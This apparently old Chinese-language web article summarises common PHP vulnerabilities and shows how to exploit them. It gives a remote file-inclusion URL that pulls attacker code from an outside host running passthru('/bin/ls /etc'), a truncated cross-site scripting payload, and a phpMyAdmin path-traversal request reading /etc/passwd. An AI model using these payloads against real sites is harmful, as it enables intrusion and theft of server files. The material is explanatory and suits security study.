PHP腳本網(wǎng)站存在的漏洞總結(jié)
我 對目前常見的PHP漏洞做了一下總結(jié),大致分為以下幾種:包含文件漏洞,腳本命令執(zhí)行漏洞,文件泄露漏洞,SQL注入漏洞等幾種.當然,至于COOKIE 欺騙等一部分通用的技術(shù)就不在這里討論了,這些資料網(wǎng)上也很多.那么,我們就一個一個來分析一下怎樣利用這些漏洞吧!
首先,我們來討論包含文件漏洞.這個漏洞應(yīng)該說是PHP獨有的吧.這是由于不充分處理外部提供的惡意數(shù)據(jù),從而導(dǎo)致遠程攻擊者可以利用這些漏洞以WEB進程權(quán)限在系統(tǒng)上執(zhí)行任意命令.我們來看一個例子:假設(shè)在a.php中有這樣一句代碼:
include($include."/xxx.php");
?>
在
這段代碼中,$include一般是一個已經(jīng)設(shè)置好的路徑,但是我們可以通過自己構(gòu)造一個路徑來達到攻擊的目的.比方說我們提
交:a.php?include=http://web/b.php,這個web是我們用做攻擊的空間,當然,b.php也就是我們用來攻擊的代碼了.我
們可以在b.php中寫入類似于:passthru("/bin/ls
/etc");的代碼.這樣,就可以執(zhí)行一些有目的的攻擊了.(注:web服務(wù)器應(yīng)該不能執(zhí)行php代碼,不然就出問題了.相關(guān)詳情可以去
看<<如何對PHP程序中的常見漏洞進行攻擊>>).在這個漏洞方面,出狀況的很多,比方說:PayPal Store
Front,
HotNews,Mambo Open Source,PhpDig,YABB SE,phpBB,InvisionBoard,SOLMETRA SPAW Editor,Les Visiteurs,PhpGedView,X-Cart等等一些.
接
著,我們再來看一下腳本命令執(zhí)行漏洞.這是由于對用戶提交的URI參數(shù)缺少充分過濾,提交包含惡意HTML代碼的數(shù)據(jù),可導(dǎo)致觸發(fā)跨站腳本攻擊,可能獲得
目標用戶的敏感信息。我們也舉個例子:在PHP Transparent的PHP PHP
4.3.1以下版本中的index.php頁面對PHPSESSID缺少充分的過濾,我們可以通過這樣的代碼來達到攻擊的目的:
http://web
/index.php?PHPSESSID=">在里面我們可以構(gòu)造函數(shù)來獲得用戶的一些敏感信息.在這個漏洞方面相對要少一點,除了
PHP Transparent之外還有:PHP-Nuke,phpBB,PHP Classifieds,PHPix,Ultimate PHP
Board等等.
再然后,我們就來看看文件泄露漏洞了.這種漏洞是由于對用戶提交參數(shù)缺少充分過濾,遠程攻擊者可以利用它進行目錄遍歷攻 擊以及獲取一些敏感信息。我們拿最近發(fā)現(xiàn)的phpMyAdmin來做例子.在phpMyAdmin中,export.php頁面沒有對用戶提交 的’what’參數(shù)進行充分過濾,遠程攻擊者提交包含多個’../’字符的數(shù)據(jù),便可繞過WEB ROOT限制,以WEB權(quán)限查看系統(tǒng)上的任意文件信息。比方說打入這樣一個地址:export.php?what=../../../../../.. /etc/passwd
關(guān)鍵字:PHP、網(wǎng)站、數(shù)據(jù)、服務(wù)器
新文章:
- CentOS7下圖形配置網(wǎng)絡(luò)的方法
- CentOS 7如何添加刪除用戶
- 如何解決centos7雙系統(tǒng)后丟失windows啟動項
- CentOS單網(wǎng)卡如何批量添加不同IP段
- CentOS下iconv命令的介紹
- Centos7 SSH密鑰登陸及密碼密鑰雙重驗證詳解
- CentOS 7.1添加刪除用戶的方法
- CentOS查找/掃描局域網(wǎng)打印機IP講解
- CentOS7使用hostapd實現(xiàn)無AP模式的詳解
- su命令不能切換root的解決方法
- 解決VMware下CentOS7網(wǎng)絡(luò)重啟出錯
- 解決Centos7雙系統(tǒng)后丟失windows啟動項
- CentOS下如何避免文件覆蓋
- CentOS7和CentOS6系統(tǒng)有什么不同呢
- Centos 6.6默認iptable規(guī)則詳解